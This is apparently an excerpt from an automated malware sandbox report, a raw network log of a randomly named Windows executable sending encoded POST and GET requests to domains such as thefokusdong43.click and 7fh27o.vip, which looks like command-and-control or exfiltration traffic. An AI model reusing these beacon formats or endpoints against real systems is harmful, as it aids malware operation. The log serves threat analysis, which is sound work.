                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.550015172.96.191.232803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:49.341437101 CET787OUTPOST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 57 76 64 6c 68 65 53 2f 70 39 32 33 37 78 50 67 2b 4f 4d 4f 35 54 30 44 65 5a 71 65 44 6a 4a 75 62 4e 41 38 39 54 63 72 67 69 79 2b 4e 51 66 6d 36 77 5a 6c 67 6b 4a 56 75 51 71 4f 2b 37 6a 35 6c 5a 38 68 44 6d 50 64 6a 32 79 6c 56 69 63 64 42 30 54 54 2f 72 6d 67 4b 55 45 4b 32 42 70 6b 45 4b 2b 37 77 4f 45 77 53 77 4f 32 6f 48 76 6d 2b 2f 70 63 33 46 67 33 46 49 46 44 54 65 4a 6d 70 44 7a 35 63 69 57 65 77 49 4d 32 51 47 67 69 53 2b 6a 36 71 37 64 56 7a 62 39 55 78 6e 78 51 2f 6c 37 66 62 6e 4a 59 6c 48 7a 4e 62 69 59 35 41 42 4e 52 4d 59 62 4a 5a 4e 59 71 44 4b 38 53 79 4c 34 6e 4f 71 52 37 74 4c 55 57 5a 2b 59 6c 6e 53 50 50 58 5a 31 56 43 37 49
                                                                        Data Ascii: J8LHgDJp=GWvdlheS/p9237xPg+OMO5T0DeZqeDjJubNA89Tcrgiy+NQfm6wZlgkJVuQqO+7j5lZ8hDmPdj2ylVicdB0TT/rmgKUEK2BpkEK+7wOEwSwO2oHvm+/pc3Fg3FIFDTeJmpDz5ciWewIM2QGgiS+j6q7dVzb9UxnxQ/l7fbnJYlHzNbiY5ABNRMYbJZNYqDK8SyL4nOqR7tLUWZ+YlnSPPXZ1VC7I
                                                                        Nov 9, 2024 05:37:50.325305939 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:50 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.550016172.96.191.232803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:51.880980968 CET1804OUTPOST /21bn/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/21bn/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 57 76 64 6c 68 65 53 2f 70 39 32 33 37 78 50 67 2b 4f 4d 4f 35 54 30 44 65 5a 71 65 44 6a 4a 75 62 4e 41 38 39 54 63 72 67 61 79 39 2f 49 66 6b 62 77 5a 6b 67 6b 4a 59 4f 51 72 4f 2b 37 45 35 6a 78 34 68 45 76 36 64 6c 36 79 6e 32 71 63 56 56 67 54 63 2f 72 6d 6f 71 55 48 48 57 42 47 6b 45 36 36 37 77 65 45 77 53 77 4f 32 70 33 76 68 76 2f 70 50 6e 46 68 6e 31 49 5a 56 54 66 73 6d 70 62 4e 35 63 6d 67 65 41 6f 4d 33 77 32 67 78 51 57 6a 34 4b 37 66 55 7a 62 6c 55 78 72 79 51 2f 35 4e 66 62 37 76 59 69 44 7a 4d 4d 37 51 2b 77 46 47 45 65 4d 55 44 5a 78 63 38 32 79 6e 61 6b 62 2b 36 4d 2b 44 2b 4a 66 6e 5a 4d 75 5a 6f 7a 44 39 61 78 67 6d 5a 56 57 32 64 55 4a 67 7a 77 69 6d 43 50 63 36 7a 30 6d 54 56 51 41 31 4d 36 6f 4c 58 76 66 5a 33 6c 39 61 37 61 42 6e 72 6d 34 72 4e 58 2f 61 66 57 6d 63 63 43 72 4f 4e 47 48 53 7a 46 6a 69 67 6f 75 51 44 64 62 56 6e 77 32 68 72 48 4c 59 56 38 31 6a 4a 51 73 75 69 43 70 4b 51 50 62 53 4e 4b 66 78 4d 45 41 44 41 57 6d 79 7a 44 47 79 46 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=GWvdlheS/p9237xPg+OMO5T0DeZqeDjJubNA89Tcrgay9/IfkbwZkgkJYOQrO+7E5jx4hEv6dl6yn2qcVVgTc/rmoqUHHWBGkE667weEwSwO2p3vhv/pPnFhn1IZVTfsmpbN5cmgeAoM3w2gxQWj4K7fUzblUxryQ/5Nfb7vYiDzMM7Q+wFGEeMUDZxc82ynakb+6M+D+JfnZMuZozD9axgmZVW2dUJgzwimCPc6z0mTVQA1M6oLXvfZ3l9a7aBnrm4rNX/afWmccCrONGHSzFjigouQDdbVnw2hrHLYV81jJQsuiCpKQPbSNKfxMEADAWmyzDGyF8S9EHpDd+8pHv5ECaCGuOHhfdxOf7smRueRQIjQ9RITvyNwPYVmM7hjSmEvaLSRgz9bgre9eCsrwhV+/PheSLcVNco67GNHqbt4uUAm9WXLd4Y6V0udn164cSgilyRswjHXHakVkTdwvEp6y8/Gw2SyWqVvs8+V3X4gzkVW89Uk3XjhYEAk9mqCMNnSHqNLv3Cx1noksLRZ63taJx5+GqNXWvnCdK1RAHHOuATKtAuv5GFOONax3ngBCFuAGxRlz97rgSzFtXGxkptfFn8syr0lYMFN4iXJh9fYCd5Q2cLfZMyqxhc3zHZf+bunrGjo8K8VDm7AIY3jRjNkB8oNoovWnv3ObbclrZhJrn9OKXUIcMA9rUcXy+WGJxpha+OT4SjHaURdT1D+Ko2X6S4rkKzHnDzEZAsPkx+Nw+eZ6q3Vyav73wTyiGgvZB/qKMRrqu8jBW1vKz3KRbVIlgoS/juSXOdbuDs5OuGhzA4YvHSN7Bwf1qG5mjeaCumNHHZMfE5Q28rrkLIM+F22X3+QQmKe41KdATpDJJ//AVftFJtceSUlWu/xwTywailEpASMpfEIjFYMVFBLP2MJiqhapDx1clFJvI65qi+8iT2VarahiKuj6HrrsUqmb5r+BrOPqQDkmyiXtKmQZ4nK7PGPrvCescEPRDUU+mI [TRUNCATED]
                                                                        Nov 9, 2024 05:37:52.860331059 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:52 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.550017172.96.191.232803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:54.426398993 CET496OUTGET /21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w== HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:55.435995102 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Sat, 09 Nov 2024 04:37:55 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.5500183.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:00.692640066 CET737OUTPOST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 74 63 4b 36 4f 73 61 77 43 38 4a 41 32 31 38 73 58 75 50 63 4f 53 76 6f 39 54 56 67 6e 4f 7a 59 67 5a 38 4c 46 2f 59 72 77 6b 4d 4d 55 41 4a 41 64 37 55 6f 65 77 62 32 43 31 41 63 32 59 4b 59 78 46 4d 75 38 4c 64 4b 58 70 47 33 53 6b 6c 6e 46 49 47 49 5a 56 58 44 4f 61 45 46 33 6e 31 65 36 73 59 2b 4d 52 61 65 2f 51 64 47 42 65 71 36 42 72 72 6b 4d 62 74 6d 61 32 32 79 61 49 73 36 37 72 73 62 30 5a 44 51 71 6c 6c 69 6a 62 39 6d 5a 6d 4e 42 41 44 31 36 4a 44 54 6a 4b 48 66 77 79 4b 6f 63 51 42 4d 66 6e 39 76 61 42 2b 30 43 39 6c 61 4c 39 63 71 6c 49 39 6b 6f 2b 4d 52 59 66 32 48 44 4d 50 34 3d
                                                                        Data Ascii: J8LHgDJp=tcK6OsawC8JA218sXuPcOSvo9TVgnOzYgZ8LF/YrwkMMUAJAd7Uoewb2C1Ac2YKYxFMu8LdKXpG3SklnFIGIZVXDOaEF3n1e6sY+MRae/QdGBeq6BrrkMbtma22yaIs67rsb0ZDQqllijb9mZmNBAD16JDTjKHfwyKocQBMfn9vaB+0C9laL9cqlI9ko+MRYf2HDMP4=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.5500193.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:03.283164024 CET757OUTPOST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 74 63 4b 36 4f 73 61 77 43 38 4a 41 31 57 55 73 56 4a 37 63 50 79 76 72 68 44 56 67 70 75 7a 63 67 5a 77 4c 46 36 67 37 78 57 59 4d 54 6b 5a 41 61 34 4d 6f 64 77 62 32 4a 56 42 55 34 34 4b 70 78 46 77 6d 38 4a 4a 4b 58 70 43 33 53 6c 56 6e 46 37 75 50 62 46 58 64 57 71 45 48 34 48 31 65 36 73 59 2b 4d 53 6e 57 2f 51 46 47 43 76 36 36 41 4a 44 6e 4b 72 74 6e 4c 32 32 79 65 49 73 32 37 72 73 70 30 64 44 32 71 6d 4e 69 6a 65 5a 6d 61 7a 68 4f 4c 44 31 38 4b 7a 53 4f 44 55 47 30 2f 61 55 32 55 67 4e 56 78 4c 6a 66 41 49 46 6f 6e 48 53 6a 75 38 47 64 59 75 73 66 76 38 77 78 46 56 58 7a 53 59 73 5a 32 68 78 57 34 65 74 49 4f 4b 71 43 61 2f 75 45 6a 72 6a 73
                                                                        Data Ascii: J8LHgDJp=tcK6OsawC8JA1WUsVJ7cPyvrhDVgpuzcgZwLF6g7xWYMTkZAa4Modwb2JVBU44KpxFwm8JJKXpC3SlVnF7uPbFXdWqEH4H1e6sY+MSnW/QFGCv66AJDnKrtnL22yeIs27rsp0dD2qmNijeZmazhOLD18KzSODUG0/aU2UgNVxLjfAIFonHSju8GdYusfv8wxFVXzSYsZ2hxW4etIOKqCa/uEjrjs


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.5500203.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:05.817269087 CET1774OUTPOST /9lti/ HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.7fh27o.vip
                                                                        Referer: http://www.7fh27o.vip/9lti/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 74 63 4b 36 4f 73 61 77 43 38 4a 41 31 57 55 73 56 4a 37 63 50 79 76 72 68 44 56 67 70 75 7a 63 67 5a 77 4c 46 36 67 37 78 57 67 4d 55 54 78 41 63 5a 4d 6f 63 77 62 32 58 6c 42 56 34 34 4b 30 78 46 59 63 38 4a 56 61 58 72 4b 33 53 48 64 6e 4e 71 75 50 53 46 58 64 4b 61 45 45 33 6e 30 4b 36 74 6f 79 4d 53 33 57 2f 51 46 47 43 74 53 36 4a 37 72 6e 52 72 74 6d 61 32 32 2b 61 49 74 66 37 72 45 35 30 64 57 4c 74 57 74 69 6a 2b 4a 6d 4b 52 5a 4f 4a 6a 31 2b 44 6a 53 57 44 55 36 37 2f 5a 77 51 55 67 70 37 78 4d 6e 66 4d 75 30 7a 7a 6a 69 58 37 65 43 53 53 66 4e 38 35 73 45 6e 59 44 53 41 58 34 78 2f 30 54 35 65 79 71 56 32 43 72 50 52 4c 49 57 31 6a 73 75 2b 54 2b 4a 6d 70 49 70 62 74 41 49 4c 35 62 61 68 69 38 73 6b 48 68 69 30 2b 50 31 69 30 4b 32 67 6c 50 46 38 6e 4c 71 54 6f 76 32 4b 73 67 38 36 32 71 34 65 35 6e 71 71 5a 7a 31 59 48 63 6a 57 4a 38 4d 2f 54 6b 4c 2b 38 5a 55 56 36 7a 4a 6f 33 77 32 37 77 38 6e 48 34 59 35 7a 55 5a 2f 39 37 42 6e 55 69 35 38 2f 34 72 49 73 35 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=tcK6OsawC8JA1WUsVJ7cPyvrhDVgpuzcgZwLF6g7xWgMUTxAcZMocwb2XlBV44K0xFYc8JVaXrK3SHdnNquPSFXdKaEE3n0K6toyMS3W/QFGCtS6J7rnRrtma22+aItf7rE50dWLtWtij+JmKRZOJj1+DjSWDU67/ZwQUgp7xMnfMu0zzjiX7eCSSfN85sEnYDSAX4x/0T5eyqV2CrPRLIW1jsu+T+JmpIpbtAIL5bahi8skHhi0+P1i0K2glPF8nLqTov2Ksg862q4e5nqqZz1YHcjWJ8M/TkL+8ZUV6zJo3w27w8nH4Y5zUZ/97BnUi58/4rIs5p7mSkIlBRWazAKkiH8SjPf/lto9R42X39cw+0OoromNkF6uFBUBzuzaz71F/uqFCX1Ldrq/FfMqycbVxzc/hh7urYWBMBzoAHp2OYQYP2FBYz9FB/vSBHnUkf2JhJZ+wdLqaI+HkAicLOarYqWibhTjhOjPAdWzJDJXBLHlaavN5pugJRBs0++oRWPLtF7UmrLSTr+OhpQcVtkWIiXJa9xok45rpX+lQsW7xnDv1AT1Psicq87esOa9EHiRC/u1qEfOxpqdPg41ZZrgMw3TFigmEA20crHQQafc4dUETZgWPxIowu/UNWmzZQCYULiwLi/UQyQHd707rQu9n0SezXDyetaQ9vpkDItca4Ou4BrXLNQKXi9eigYPQwbruw/6a2tjOzF+IifTEPLahhi4VJlo1TiPwLNQ0H0WoSlKst8uuWlPpuz2nFy+rQrubtQaRzpu0LJGQJZmrMlQCcXF4LM0mMqrqCtAXHBEz2cQwC9/yOrcBg81VS7Syh3JDsDoboOxLL8GAL0rC+ypqRHgpIIncB4SS6MEj9pYPyXZhEjuDQyphcOBwWXmUs2ntLxRpn1lggtlLIDVnyT1bs/cuQ5Ik7QIgWxJTPdMgp0ipqnYXTqA7ZHuGJde4yV5mX8EIkQqjJO34gitvE4XTCFYy1SmO87ojlAq1Vf [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.5500213.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:08.492327929 CET486OUTGET /9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.7fh27o.vip
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:09.122514963 CET414INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:38:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
